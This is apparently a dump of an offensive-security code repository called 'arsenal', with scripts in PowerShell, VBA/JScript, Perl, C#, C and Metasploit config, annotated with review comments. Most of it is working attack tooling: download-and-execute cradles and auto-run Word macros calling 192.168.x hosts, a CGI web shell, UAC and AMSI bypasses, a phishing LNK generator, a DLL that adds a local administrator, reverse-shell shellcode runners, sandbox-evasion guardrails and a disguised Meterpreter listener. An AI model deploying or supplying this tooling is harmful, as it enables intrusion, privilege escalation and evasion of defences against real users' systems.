├── README.md
├── psh
├── ReflectiveDllB64.ps1
├── ReflectiveDllDisk.ps1
├── ReflectiveDllFetch.ps1
├── csharp_compile.ps1
├── UAC-Bypass-fodhelper.ps1
├── Invoke-LnkGen.ps1
├── EncodeCaesar.ps1
├── Invoke-IsoGen.ps1
├── ReflectiveScRunnerLookup.ps1
├── SqlCmd.ps1
├── AmsiBypass-AmsiOpenSession.ps1
├── AmsiBypass-AmsiScanBuffer.ps1
├── ReflectiveScRunnerPInvoke.ps1
├── ReflectiveScInject.ps1
├── Invoke-Rbcd.ps1
├── New-IsoFile.ps1
├── BadWords.txt
└── Test-LDAP.ps1
├── perl
├── upload.pl
├── cmd.pl
└── rundll.pl
├── wsh
├── Stub-DechainedWmi.vb
├── Stub-Sleep.vb
├── cmd.hta
├── Jscript-Cmd.xsl
├── Amsi-Enable-Bypass.js
├── Stub-DecimalDecryptor.vb
├── Amsi-Imposter-Bypass.js
├── PshDownloadExec.vb
├── Stub-Dechained-02.vb
├── DownloadAlt.vb
├── InMemoryWin32CreateThread.vb
├── RunnerDecimalObfsNameCheck.vb
├── DownloadExec.vb
├── InMemoryWin32CreateThread-SleepyCaesar.vb
├── g2js-vbascriptb64_template.vba
└── g2js-htascript_template.hta
├── csharp
├── Sleep.cs
├── Guardrail-FlsAlloc.cs
├── ClassReflectiveDllPoc.cs
├── Guardrail-ExNuma.cs
├── Telerik-MixedMode-Assembly-Runner.cs
├── SharpResolver.cs
├── SharpHttpFetch.cs
├── GzipBuffer.cs
├── Reflective-Dll-Runner.cs
├── Reflective-PE-Runner.cs
├── Guardrail-MininumBrowsersChecker.cs
├── AddUserAdmin.cs
├── ClassSayMyName.cs
├── ScRunner.cs
├── SharpDllPoc.cs
├── UninstallerRunspaceBypass.cs
├── UninstallerReflectiveDllLoader.cs
├── UninstallerReflectivePELoader.cs
├── DllInject.cs
├── RunspaceBypass.cs
├── ScInject.cs
├── PsExecLess.cs
├── XorString.cs
├── BufferOverflowPoc.cs
└── DInvokeScRunner.cs
├── py
├── rundll.py
├── request_shell.py
└── DotNetNuke-Cookie-Deserialization.py
├── conf
├── apache-ssl.conf
├── msf-https-listener.rc
└── nginx-redirector.conf
├── c
├── Guardrail-isDomainJoined.c
├── exec_dll-winapi.c
├── ScRunnerCaesar.c
├── ScRunner.c
├── ScXorEncoder.c
├── ScRunnerXor.c
├── ScCaesarEncoder.c
├── exec_dll-apientry.c
├── SharedPreLoad.c
└── windows
│ ├── xor_test.c
│ └── inflate.c
├── cpp
├── Guardrail-SayMyName.cpp
├── DllScInject.cpp
├── DllScHollow.cpp
└── CppCplRunner.cpp
├── msbuild
├── MSBuild-Csharp-x64.xml
├── WorflowCompilerXmlGenerator.ps1
├── WorkflowCompiler-Reflective-PE-Runner.cs
├── MSBuild-RunspaceBypass-x64.xml
├── WorkFlowCompiler.xml
├── MSBuild-RunspaceBypass-Interactive-x64.xml
└── MSBuild-Hollow-Runner-x64.xml
├── misc
├── HtmlSmuggling.html
└── ScRunner.aspx
└── infra
└── Dockerfile.ollvm
/README.md:
--------------------------------------------------------------------------------
1 | # arsenal
2 |
Miscellaneous exploit scripts, hacks and code stubs, grouped by language/tooling (PowerShell, Perl, WSH/VBA, C#, Python, C/C++, MSBuild, server configs).
4 |
--------------------------------------------------------------------------------
/psh/ReflectiveDllB64.ps1:
--------------------------------------------------------------------------------
# Reflectively load a base64-encoded .NET assembly from memory and call its entry method.
# $b64 is a placeholder: replace it with the base64 of the compiled DLL. Nothing is written to disk.
$b64 = "..."
$assemblyBytes = [Convert]::FromBase64String($b64)
# Left unassigned on purpose: the loaded Assembly object is emitted to the pipeline exactly as before.
[System.Reflection.Assembly]::Load($assemblyBytes)
# Assumes the assembly exposes a static ClassMyMiniDump.Class1.runner() method.
[ClassMyMiniDump.Class1]::runner()
4 |
--------------------------------------------------------------------------------
/perl/upload.pl:
--------------------------------------------------------------------------------
#!/bin/perl
# Fetch a URL to a local path:  upload.pl <url> <destination-file>
# Despite the name this is a downloader: LWP::Simple::getstore pulls <url> and writes it to <destination-file>.
use LWP::Simple;

# Exactly two arguments are required; any other count does nothing (silently).
if (scalar(@ARGV) == 2) {
    my ($url, $dest) = @ARGV;
    print "saving $url as $dest\n";
    # getstore returns the HTTP status code, which is printed as-is (no trailing newline, as before).
    print getstore($url, $dest);
}
--------------------------------------------------------------------------------
/psh/ReflectiveDllDisk.ps1:
--------------------------------------------------------------------------------
# Read a .NET DLL from disk, load it into the current process via Assembly.Load(byte[]) and call ClassLibrary1.Class1::runner().
# NOTE(review): Assembly.Load($dll) is invoked twice on the same byte array; the second call is redundant
# (it only adds a second Assembly object to the pipeline output) and can be dropped.
$dll = [System.IO.File]::ReadAllBytes("C:\temp\evil.dll"); [System.Reflection.Assembly]::Load($dll); [System.Reflection.Assembly]::Load($dll) ; [ClassLibrary1.Class1]::runner()
--------------------------------------------------------------------------------
/psh/ReflectiveDllFetch.ps1:
--------------------------------------------------------------------------------
# Download a .NET DLL over HTTP, load it from memory (never written to disk) and call Class1::runner().
# The URL is hard-coded and plain HTTP: the bytes are neither authenticated nor integrity-checked in transit.
$webClient = New-Object System.Net.WebClient
$dll = $webClient.DownloadData("http://192.168.49.83/ClassLibrary1-x86.dll")
[System.Reflection.Assembly]::Load($dll)
[ClassLibrary1.Class1]::runner()
4 |
--------------------------------------------------------------------------------
/wsh/Stub-DechainedWmi.vb:
--------------------------------------------------------------------------------
' Start a process through WMI (Win32_Process.Create) instead of Shell, so the child is created by the
' WMI provider host rather than directly by the Office process (hence "dechained" parent/child).
Sub MyMacro
strArg = "powershell"
' pid receives the new process id; the method's return code (0 = success) is not checked.
GetObject("winmgmts:").Get("Win32_Process").Create strArg, Null, Null, pid
End Sub

' Word auto-run entry point.
Sub AutoOpen()
MyMacro
End Sub
--------------------------------------------------------------------------------
/csharp/Sleep.cs:
--------------------------------------------------------------------------------
// Fragment: timing-based sandbox check. Sleep for 2 s and bail out if less than 1.5 s actually
// elapsed, i.e. the environment fast-forwarded the sleep.
// NOTE(review): the extern needs a [DllImport("kernel32.dll")] attribute to bind; as written it cannot be called.
static extern void Sleep(uint dwMilliseconds);
// main
DateTime t1 = DateTime.Now;
Sleep(2000);
double t2 = DateTime.Now.Subtract(t1).TotalSeconds;
// NOTE(review): DateTime.Now is wall-clock time and moves with clock adjustments; System.Diagnostics.Stopwatch would not.
if (t2 < 1.5)
{
return;
}
10 |
--------------------------------------------------------------------------------
/wsh/Stub-Sleep.vb:
--------------------------------------------------------------------------------
' sleep
' Fragment meant to sit inside a Function: sleep 2 s and leave the enclosing Function if fewer than
' 2 wall-clock seconds elapsed (a fast-forwarded Sleep).
' NOTE(review): Sleep is not declared here; a Declare (PtrSafe) Sub Sleep Lib "kernel32" line is required first.
' NOTE(review): Now() has one-second resolution and DateDiff("s", ...) counts whole seconds, so a genuine 2000 ms
' sleep can read as 1 and wrongly bail; 1 would be a safer threshold for this check.
Dim t1 As Date
Dim t2 As Date
Dim time As Long

t1 = Now()
Sleep (2000)
t2 = Now()
time = DateDiff("s", t1, t2)
If time < 2 Then
Exit Function
End If
--------------------------------------------------------------------------------
/psh/csharp_compile.ps1:
--------------------------------------------------------------------------------
# Compile an inline C# program to hello.exe with Add-Type (uses the in-box csc; no Visual Studio needed).
# The here-string below is the exact source handed to the compiler.
$source = @'
using System;

public class Hello {
public static void Main(string[] Args) {
System.Console.WriteLine("yolo");
}
}
'@
Add-Type -TypeDefinition $source -OutputAssembly hello.exe
--------------------------------------------------------------------------------
/perl/cmd.pl:
--------------------------------------------------------------------------------
#!/bin/perl
# CGI web shell: executes the raw query string as a shell command and returns its output as the
# response body. No authentication and no input validation, by design — lab/engagement use only.
print "HTTP/1.0 200 OK\n";
print "Content-Type: text/html\n\n\n";

# Only two percent-escapes are decoded (%20 space, lowercase %3b semicolon); everything else is passed verbatim.
my $color = $ENV{QUERY_STRING};
chomp ($color);
$color =~ s/%20/ /g;
$color =~ s/%3b/;/g;

# system with a single string goes through /bin/sh, so pipes/redirects in the query string are honoured.
# Command output goes straight to STDOUT (the HTTP body); the exit status is discarded.
system $color;
exit(0);
--------------------------------------------------------------------------------
/py/rundll.py:
--------------------------------------------------------------------------------
#!/usr/bin/python
# source: https://twitter.com/chvancooten/status/1418969800823513093
# execute unmanaged dll via its EntryPoint, context will be python.exe
import ctypes

# ctypes.WinDLL calls LoadLibrary, so the DLL's DllMain (DLL_PROCESS_ATTACH) already runs here,
# before any export is touched. The path is hard-coded.
result = ctypes.WinDLL("c:\\windows\\tasks\\exec.dll")
# Calls the exported "Update" function with stdcall convention; AttributeError if the DLL has no such export.
result.Update()

quit()
--------------------------------------------------------------------------------
/csharp/Guardrail-FlsAlloc.cs:
--------------------------------------------------------------------------------
// Sandbox guardrail fragment: FlsAlloc is a genuine kernel32 export that some emulators do not
// implement; the intent is to exit early when the call fails.
[DllImport("kernel32.dll", SetLastError = true)]
static extern IntPtr FlsAlloc(IntPtr callback);
static void Main(string[] args)
{
// Win32 FlsAlloc returns a DWORD index, or FLS_OUT_OF_INDEXES (0xFFFFFFFF) on failure — not NULL.
IntPtr mem = FlsAlloc(IntPtr.Zero);
// NOTE(review): IntPtr is a value type, so `mem == null` is always false and this branch never runs.
// The check needs to compare against the documented failure value (e.g. (uint)mem.ToInt64() == 0xFFFFFFFF).
if (mem == null)
{
return;
}
[...]
--------------------------------------------------------------------------------
/wsh/cmd.hta:
--------------------------------------------------------------------------------
1 |
2 |
3 |
7 |
8 |
9 | Test
10 |
13 |
14 |
--------------------------------------------------------------------------------
/psh/UAC-Bypass-fodhelper.ps1:
--------------------------------------------------------------------------------
# fodhelper.exe resolves its ms-settings: handler from HKCU, where the current user can write, so the
# command registered below runs in fodhelper's auto-elevated context.
# NOTE(review): the first line uses an en dash (U+2013) in front of Force. PowerShell's tokenizer accepts it,
# but it does not survive every editor/terminal; use a plain ASCII hyphen.
New-Item -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Value "c:\users\vic\desktop\hollow.exe" –Force

# An empty DelegateExecute value makes the shell fall back to the (Default) command line above.
New-ItemProperty -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Name DelegateExecute -PropertyType String -Force

# Trigger. The registry key is never removed afterwards: clean up with
# Remove-Item -Path HKCU:\Software\Classes\ms-settings -Recurse -Force once done.
C:\Windows\System32\fodhelper.exe
6 |
--------------------------------------------------------------------------------
/perl/rundll.pl:
--------------------------------------------------------------------------------
use Win32::API;

# rundll32.pl - load dll with perl
# @thelikes_
# help: https://stackoverflow.com/questions/45059300/win32api-giving-wrong-prototype-error
# sample dll: https://github.com/thelikes/arsenal/blob/main/c/exec_dll-2.c

# Win32::API->new calls LoadLibrary on the DLL, so its DllMain (DLL_PROCESS_ATTACH) executes right here.
# The DllMain prototype bound below is never invoked explicitly; $function is unused and the script exits.
$function = Win32::API->new("c:\\payloads\\exec_dll\\output\\exec_dll64.dll", "DllMain",[ 'N', 'P', 'P' ], 'N', '__cdecl');

exit(0);
--------------------------------------------------------------------------------
/wsh/Jscript-Cmd.xsl:
--------------------------------------------------------------------------------
1 |
2 |
6 |
7 |
8 |
9 |
10 |
14 |
15 |
16 |
--------------------------------------------------------------------------------
/wsh/Amsi-Enable-Bypass.js:
--------------------------------------------------------------------------------
// Turn off script-host AMSI scanning via HKCU\...\Windows Script\Settings\AmsiEnable = 0, re-run this
// very script under cscript, then restore the value to 1. On the re-run AmsiEnable is 0, the try block
// completes without throwing, and execution continues past this block (the real work goes after it).
var sh = new ActiveXObject('WScript.Shell');
var key = "HKCU\\Software\\Microsoft\\Windows Script\\Settings\\AmsiEnable";
try{
// RegRead throws when the value does not exist; that lands in catch just like a non-zero value does.
var AmsiEnable = sh.RegRead(key);
if(AmsiEnable!=0){
throw new Error(1, '');
}
}catch(e){
sh.RegWrite(key, 0, "REG_DWORD");
// Run(cmd, 0, 1): hidden window, and wait for the child to finish before re-enabling AMSI.
// The -e: CLSID selects the JScript engine regardless of the file extension.
// NOTE(review): there is no space between the CLSID and the script path in this command line; verify
// cscript accepts that, the commonly published form is "...BBBB58} " + WScript.ScriptFullName.
sh.Run("cscript -e:{F414C262-6AC0-11CF-B6D1-00AA00BBBB58}"+WScript.ScriptFullName,0,1);
sh.RegWrite(key, 1, "REG_DWORD");
WScript.Quit(1);
}
--------------------------------------------------------------------------------
/wsh/Stub-DecimalDecryptor.vb:
--------------------------------------------------------------------------------
' Decoder for the "decimal Caesar" encoding produced by psh/EncodeCaesar.ps1: every character is
' stored as (byte value + 17) written as exactly three decimal digits, all concatenated.
' Function names are deliberately meaningless (fruit/food words) to avoid keyword-based detection.

' Decode one 3-digit chunk: undo the +17 shift and convert back to a character.
Function Pears(Beets)
Pears = Chr(Beets - 17)
End Function

' First three characters of the remaining encoded string (the next chunk).
Function Strawberries(Grapes)
Strawberries = Left(Grapes, 3)
End Function

' Everything after the first three characters. Errors when fewer than 3 remain (negative length),
' so the encoded input length must be a multiple of 3.
Function Almonds(Jelly)
Almonds = Right(Jelly, Len(Jelly) - 3)
End Function

' Decode a whole encoded string three digits at a time. Oatmilk is an implicitly declared Variant
' accumulator; an empty input still runs the loop body once (Do ... Loop While) and errors in Almonds.
Function Nuts(Milk)
Do
Oatmilk = Oatmilk + Pears(Strawberries(Milk))
Milk = Almonds(Milk)
Loop While Len(Milk) > 0
Nuts = Oatmilk
End Function
--------------------------------------------------------------------------------
/csharp/ClassReflectiveDllPoc.cs:
--------------------------------------------------------------------------------
1 | using System;
2 |
3 | /*
4 | * DLL PoC
5 | * Psh reflective load:
* > $dll = [System.IO.File]::ReadAllBytes("C:\MsgLib\bin\x64\Release\MsgLib.dll"); [System.Reflection.Assembly]::Load($dll); [System.Reflection.Assembly]::Load($dll) ; [MsgLib.MsgClass]::Start()
*   (the second Assembly.Load($dll) in that one-liner is redundant; a single load is enough to resolve MsgLib.MsgClass)
7 | */
8 |
namespace MsgLib
{
    /// <summary>
    /// Minimal managed DLL used to prove that a reflectively loaded assembly actually executes.
    /// </summary>
    public class MsgClass
    {
        /// <summary>Entry method invoked by the loader; writes a fixed marker line to stdout.</summary>
        public static void Start()
        {
            Console.Out.WriteLine("Executed!");
        }
    }
}
19 |
--------------------------------------------------------------------------------
/wsh/Amsi-Imposter-Bypass.js:
--------------------------------------------------------------------------------
// Re-launch this script from a copy of wscript.exe stored as C:\Windows\Tasks\AMSI.dll, so the
// host process is not named wscript.exe/cscript.exe. On the re-run the file already exists, the
// try block completes without throwing, and execution continues after this block.
var filesys= new ActiveXObject("Scripting.FileSystemObject");
var sh = new ActiveXObject('WScript.Shell');
try
{
// FileExists returns a Boolean; == 0 is the "missing" case.
if(filesys.FileExists("C:\\Windows\\Tasks\\AMSI.dll")==0)
{
throw new Error(1, '');
}
}
catch(e)
{
// A renamed PE image still executes; the .dll extension is cosmetic. The copy is never deleted afterwards.
filesys.CopyFile("C:\\Windows\\System32\\wscript.exe", "C:\\Windows\\Tasks\\AMSI.dll");
// Exec (unlike Run) returns immediately, so the parent quits without waiting for the child.
// NOTE(review): no space between the engine CLSID and the script path; verify the host parses this
// (the commonly published form is "...BBBB58} " + WScript.ScriptFullName).
sh.Exec("C:\\Windows\\Tasks\\AMSI.dll -e:{F414C262-6AC0-11CF-B6D1-00AA00BBBB58}"+WScript.ScriptFullName);
WScript.Quit(1);
}
--------------------------------------------------------------------------------
/psh/Invoke-LnkGen.ps1:
--------------------------------------------------------------------------------
1 | # https://www.ired.team/offensive-security/initial-access/phishing-with-ms-office/phishing-ole-+-lnk
2 |
# Build a Windows shortcut (.lnk) whose target is cmd.exe. The command line opens a decoy PDF URL and
# then loads evil.dll via rundll32. The DLL path is relative (.\evil.dll): no WorkingDirectory is set on
# the shortcut, so it resolves against whatever directory the shell launches the .lnk from.
$shell = New-Object -ComObject WScript.Shell
# output file
$shortcut = $shell.CreateShortcut("c:\payloads\nobelium\Documents.lnk")
# 7 = minimised window without focus
$shortcut.WindowStyle = "7"
$shortcut.TargetPath = "C:\Windows\System32\cmd.exe"
# predefined lnk icon (borrowed from msedge.exe, icon index 13)
$shortcut.IconLocation = "C:\program files (x86)\microsoft\edge\application\msedge, 13"
# command to execute
$shortcut.Arguments = '/c "start https://example.com/legit.pdf && rundll32 .\evil.dll,DllMain"'
$shortcut.Save()
13 |
--------------------------------------------------------------------------------
/csharp/Guardrail-ExNuma.cs:
--------------------------------------------------------------------------------
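/// <summary>
/// Sandbox guardrail: VirtualAllocExNuma is a real kernel32 export that some emulators do not
/// implement, so a failed allocation is read as "not a real host" and the program exits early.
/// </summary>
class Program {
    // The original declaration had no [DllImport]; an extern without it cannot be bound at run time.
    [DllImport("kernel32.dll", SetLastError = true)]
    static extern IntPtr VirtualAllocExNuma(IntPtr hProcess, IntPtr lpAddress, uint dwSize, UInt32 flAllocationType, UInt32 flProtect, UInt32 nndPreferred);

    [DllImport("kernel32.dll")]
    static extern IntPtr GetCurrentProcess();

    static void Main(string[] args)
    {
        // One page, MEM_COMMIT | MEM_RESERVE (0x3000), PAGE_READWRITE (0x4), preferred NUMA node 0.
        IntPtr mem = VirtualAllocExNuma(GetCurrentProcess(), IntPtr.Zero, 0x1000, 0x3000, 0x4, 0);
        // VirtualAllocExNuma returns NULL on failure. IntPtr is a value type, so the original
        // `mem == null` comparison could never be true; IntPtr.Zero is the correct test.
        if (mem == IntPtr.Zero)
        {
            // bail
            return;
        }

        // now do stuff
        return;
    }
}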
--------------------------------------------------------------------------------
/psh/EncodeCaesar.ps1:
--------------------------------------------------------------------------------
# Encode a command line for the VBA decoder in wsh/Stub-DecimalDecryptor.vb: each character becomes
# its byte value plus 17, rendered as exactly three decimal digits (zero-padded), all concatenated.
$payload = "powershell -exec bypass -nop -w hidden -c iex((new-object system.net.webclient).downloadstring('http://192.168.119.120/run.txt'))"

# [byte][char] restricts input to characters 0-255, so the shifted value is at most 272 and three digits always suffice.
$encodedChunks = $payload.ToCharArray() | ForEach-Object {
    ([byte][char]$_ + 17).ToString().PadLeft(3, '0')
}
[string]$output = -join $encodedChunks

Write-Host $output
--------------------------------------------------------------------------------
/conf/apache-ssl.conf:
--------------------------------------------------------------------------------
# enable the Apache SSL module (mod_ssl) first:
2 | # a2enmod ssl
3 |
# /etc/apache2/sites-available/somesite.conf  (Debian/Ubuntu layout; enable with a2ensite somesite)
5 |
# NOTE: the enclosing <VirtualHost ...:443> ... </VirtualHost> tags were lost in this copy; the directives below belong inside that block.
7 | ServerName some.site.com
8 | ServerAdmin webmaster@localhost
9 |
10 | DocumentRoot /var/www/html/
11 | DirectoryIndex index.php index.html
12 |
13 | ErrorLog ${APACHE_LOG_DIR}/web_delivery-www-error.log
14 | CustomLog ${APACHE_LOG_DIR}/web_delivery-www-access.log combined
15 |
16 | SSLEngine on
17 | SSLCertificateFile /etc/letsencrypt/live/some.site.com/fullchain.pem
18 | SSLCertificateKeyFile /etc/letsencrypt/live/some.site.com/privkey.pem
19 |
20 |
--------------------------------------------------------------------------------
/conf/msf-https-listener.rc:
--------------------------------------------------------------------------------
# Staged x64 Meterpreter listener over HTTPS, fronted by a Let's Encrypt certificate and a
# browser-like request profile so the callback traffic blends in.
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_winhttps
set LHOST fw.vaultsec.xyz
set LPORT 443
# EXITFUNC thread: ending the session terminates only the payload thread, not the host process.
set EXITFUNC thread
set verbose true
# Encode the second stage with a per-download XOR key so the staged bytes differ each time.
set EnableStageEncoding true
set StageEncoder x64/xor_dynamic
set HttpUserAgent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.42"
set HttpServerName Nginx
# unified.pem is expected to hold the private key together with the certificate chain in one PEM file.
set HandlerSSLCert /etc/letsencrypt/live/fw.vaultsec.xyz/unified.pem
# Body returned for requests that do not match a payload URI. The quoted value spans two lines here,
# exactly as in the original (it embeds a newline).
set HttpUnknownRequestResponse "zzz
"
# NOTE(review): a Cookie header carries name=value pairs; "PHPSESS: 112391323913" is not a valid pair
# and stands out to anything that parses cookies. "PHPSESSID=112391323913" would be the expected shape.
set HttpCookie "PHPSESS: 112391323913"
set HttpReferer "https://fw.vaultsec.xyz/status?t=1aIIt2313"
# Keep the handler alive after the first session instead of exiting.
set ExitOnSession false
exploit -j
17 |
--------------------------------------------------------------------------------
/c/Guardrail-isDomainJoined.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 | #include
5 |
6 | /*
7 | * Guardrail to determine if a system is domain joined.
8 | * @thelikes
9 | */
10 |
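/*
 * Return true when the machine reports a DNS domain name, i.e. it appears to be domain joined.
 *
 * GetComputerNameEx(ComputerNameDnsDomain) fills domainNameBuf; an empty string is taken as
 * "not joined" (the API contract for workgroup machines — assumed, verify against the docs).
 *
 * The original never checked the call's return value and left the buffer uninitialised, so a
 * failed call (e.g. ERROR_MORE_DATA for a name longer than MAX_PATH) was decided on whatever
 * happened to be on the stack. The buffer is now zeroed and any failure reads as "not joined".
 */
bool isDomainJoined() {
    DWORD bufSize = MAX_PATH;
    TCHAR domainNameBuf[ MAX_PATH ] = { 0 };

    if (!GetComputerNameEx( ComputerNameDnsDomain, domainNameBuf, &bufSize )) {
        return false;
    }

    //printf("name: %s", domainNameBuf);

    return domainNameBuf[0] != '\0';
}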
26 |
/* Print "true" or "false" (no trailing newline) depending on the domain-membership check. */
int main() {
    const char *verdict = isDomainJoined() ? "true" : "false";
    printf("%s", verdict);

    return 0;
}
--------------------------------------------------------------------------------
/psh/Invoke-IsoGen.ps1:
--------------------------------------------------------------------------------
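# source: https://gist.githubusercontent.com/mgraeber-rc/a780834c983bc0d53121c39c276bd9f3/raw/94e9e4b685f03bb0dadc5a6516948c1c55c5e080/SimulateInternetZoneTest.ps1

# Usage:
# 1) create a directory and populate its contents with files intended to be enclosed in the ISO/IMG
# 2) configure the image name, parcel title, and iso directory
# 3) run
$eviliso = "Documents.iso"
$isodir = "Documents"
$parceltitle = "Documents"

# Create an ISO file from the $isodir directory.
# The New-IsoFile helper ships next to this script (psh/New-IsoFile.ps1; assumed to be the same
# function as the one previously fetched), so it is dot-sourced from disk. The original did
#   (New-Object net.webclient).DownloadString('https://raw.githubusercontent.com/wikijm/PowerShell-AdminScripts/master/Miscellaneous/New-IsoFile.ps1')|iex
# at every run, which executes whatever that remote host serves at that moment with no integrity check.
. (Join-Path $PSScriptRoot 'New-IsoFile.ps1')
# -Force includes hidden files; -Media CDR picks a single-session CD-R image type.
ls -Force $isodir | New-IsoFile -Path $eviliso -Media CDR -Title $parceltitle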
14 |
--------------------------------------------------------------------------------
/cpp/Guardrail-SayMyName.cpp:
--------------------------------------------------------------------------------
// SOURCE: https://gist.github.com/benheise/ad7f2adb605a7ec216a506e821705a06
// quick and dirty C++ execution guardrail on executing process file name, inspired by @0xHop av evasion post
// https://0xhop.github.io/evasion/2021/04/19/evasion-pt1/

#include
#include

// Fragment meant to be pasted at the top of main(): compare the running executable's base name
// with a hard-coded expected name and exit quietly if they differ.

// Hide the console window
//ShowWindow (GetConsoleWindow(), SW_HIDE);

// compare current and expected process name, exit if they don't match (ie executing in a sandbox)
TCHAR szName[MAX_PATH];
char ourName[] = "evade.exe";
// GetModuleBaseName is declared in Psapi.h; the return value (0 on failure) is not checked.
GetModuleBaseName(GetCurrentProcess(), GetModuleHandle(NULL), szName, MAX_PATH);

// if they dont match, exit. otherwise get this party started
// NOTE(review): strcmp takes char*, so this only compiles in an ANSI build where TCHAR is char.
// It is also case-sensitive, while Windows file names are not ("Evade.exe" would bail); _stricmp would match the OS.
if (strcmp(ourName, szName) != 0) {
exit(STATUS_SUCCESS);
}
--------------------------------------------------------------------------------
/msbuild/MSBuild-Csharp-x64.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
9 |
10 |
11 |
26 |
27 |
28 |
29 |
--------------------------------------------------------------------------------
/c/exec_dll-winapi.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 |
5 | // compile:
6 | // "c:\MinGW\bin\mingw32-g++.exe" -Wall -DBUILD_DLL -O2 -c exec_dll.c -o exec_dll.o
7 | // "c:\MinGW\bin\mingw32-g++.exe" -shared -Wl,--dll exec_dll.o -o exec_dll.dll
8 |
// Payload: create a local user "spook" with a hard-coded password and add it to the local
// Administrators group. Both commands only succeed if the loading process already runs elevated.
// WinExec with nCmdShow=0 hides the console windows and returns immediately: nothing waits for
// or checks the result. The password is a plain string in the DLL and is visible to any scanner.
int Exploit()
{
WinExec("cmd.exe /c net user spook Summer2021! /add",0);
WinExec("cmd.exe /c net localgroup administrators spook /add", 0);
return 0;
}
15 |
// Runs Exploit() as soon as the DLL is mapped (DLL_PROCESS_ATTACH), so any loader — rundll32,
// a scripting LoadLibrary, Win32::API — triggers it without calling a named export.
// Creating processes from DllMain happens under the loader lock; it works in practice with WinExec
// but is outside what Microsoft's DllMain guidance sanctions. Always returns TRUE so the load succeeds.
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved)
{
switch (fdwReason)
{
case DLL_PROCESS_ATTACH:
Exploit();
break;
case DLL_THREAD_ATTACH:
break;
case DLL_THREAD_DETACH:
break;
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
--------------------------------------------------------------------------------
/c/ScRunnerCaesar.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 |
5 | int main (int argc, char **argv)
6 | {
7 | unsigned char buf[] = "\x4C\x35\x03\x6E\x0D\x5C\x9D\xBA\x14\x4C\x8D\xDA\x51\x35\xCD\x6E\x26\x45\x5E\xB6\x0B\x13\x09\x4C\x89\xC4\x7C\x55\x6E\x0E\x45\x5D\x54\x6E\x2D\x5C\x9D\x6E\x06\x63\x6E\x05\x62\x13\x09\x4C\x89\xC4\x7C\x3F\x4C\x9B\x4C\xBD\x06\x04\x23\x94\xC4\xAC\x35\x57\x55\x4C\x8D\xEA\x6E\x14\x5E\x6E\x2E\x5C\x13\x09\x5D\x4C\x89\xC4\x7D\x29\x4D\x03\xCD\x78\x1C\x5B\x6E\x27\x5C\x6E\x04\x6E\x09\x4C\x8D\xEB\x4C\x35\xFA\x13\x09\x5D\x5D\x63\x4C\x89\xC4\x7D\xCB\x6E\x40\x5C\x6E\x05\x63\x13\x09\x62\x6E\x82\x5E\x13\x09\x4C\x89\xC4\x7C\xF1\x03\xEA\x04";
8 | int buflen = (int) sizeof(buf);
9 |
10 | for (int i=0; i
2 | #include
3 | #include
4 |
5 | // compile
6 | // gcc -o ScRunner.out ScRunner.c -z execstack
7 |
// Linux x86-64 shellcode runner: the raw bytes live in a stack array and execution jumps into them.
// The stack is non-executable by default, hence -z execstack in the compile line above.
int main (int argc, char **argv)
{
// Same bytes as the plaintext buffer in c/ScXorEncoder.c. c/ScCaesarEncoder.c carries an almost identical
// buffer that differs in two bytes (\x1f\x90 vs \x00\x50 here, which looks like a port field: 8080 vs 80 —
// verify against the generator before assuming the encoders and this runner are in sync).
unsigned char buf[] =
"\x48\x31\xff\x6a\x09\x58\x99\xb6\x10\x48\x89\xd6\x4d\x31\xc9"
"\x6a\x22\x41\x5a\xb2\x07\x0f\x05\x48\x85\xc0\x78\x51\x6a\x0a"
"\x41\x59\x50\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f\x05"
"\x48\x85\xc0\x78\x3b\x48\x97\x48\xb9\x02\x00\x00\x50\xc0\xa8"
"\x31\x53\x51\x48\x89\xe6\x6a\x10\x5a\x6a\x2a\x58\x0f\x05\x59"
"\x48\x85\xc0\x79\x25\x49\xff\xc9\x74\x18\x57\x6a\x23\x58\x6a"
"\x00\x6a\x05\x48\x89\xe7\x48\x31\xf6\x0f\x05\x59\x59\x5f\x48"
"\x85\xc0\x79\xc7\x6a\x3c\x58\x6a\x01\x5f\x0f\x05\x5e\x6a\x7e"
"\x5a\x0f\x05\x48\x85\xc0\x78\xed\xff\xe6";

// Cast the buffer to a function pointer and call it; control only returns if the shellcode returns.
int (*ret)() = (int(*)())buf;
ret();
}
24 |
--------------------------------------------------------------------------------
/wsh/PshDownloadExec.vb:
--------------------------------------------------------------------------------
' Word auto-run entry point (Document_Open); mirrors AutoOpen below so either trigger fires the macro.
Sub Document_Open()
MyMacro
End Sub
4 |
' Legacy Word auto-run entry point.
Sub AutoOpen()
MyMacro
End Sub
8 |
' Download esrl.exe over plain HTTP with a hidden PowerShell process, wait a fixed 2 seconds, then run it.
' Shell returns as soon as PowerShell starts, so the Wait is a guess at the download time, not a
' completion check: a slow download means the second Shell fails because the file is not there yet.
Sub MyMacro()
Dim str As String
str = "powershell (New-Object System.Net.WebClient).DownloadFile('http://192.168.49.83/esrl.exe','esrl.exe')"
Shell str, vbHide

' Luckily, downloaded content will end up in the current folder of the Word document and we can obtain the path name with the ActiveDocument.Path
' (this relies on the Office process's current directory being the document folder — confirm on the target build)
Dim exePath As String
' Word
exePath = ActiveDocument.Path + "\esrl.exe"
' Excel
' exePath = Application.ActiveWorkbook.path + "\esrl.exe"
Wait (2)
Shell exePath, vbHide
End Sub
23 |
24 | ' introduce delay as download time my vary
' Busy-wait for n seconds while pumping the message loop (DoEvents) so the host UI stays responsive.
' Resolution is that of Now (whole seconds); CPU is spent spinning for the whole interval.
Sub Wait(n As Long)
Dim t as Date
t = Now
Do
DoEvents
Loop Until Now >= DateAdd("s", n, t)
End Sub
--------------------------------------------------------------------------------
/csharp/Telerik-MixedMode-Assembly-Runner.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Configuration.Install;
3 | using System.Collections;
4 | using System.Collections.Specialized;
5 |
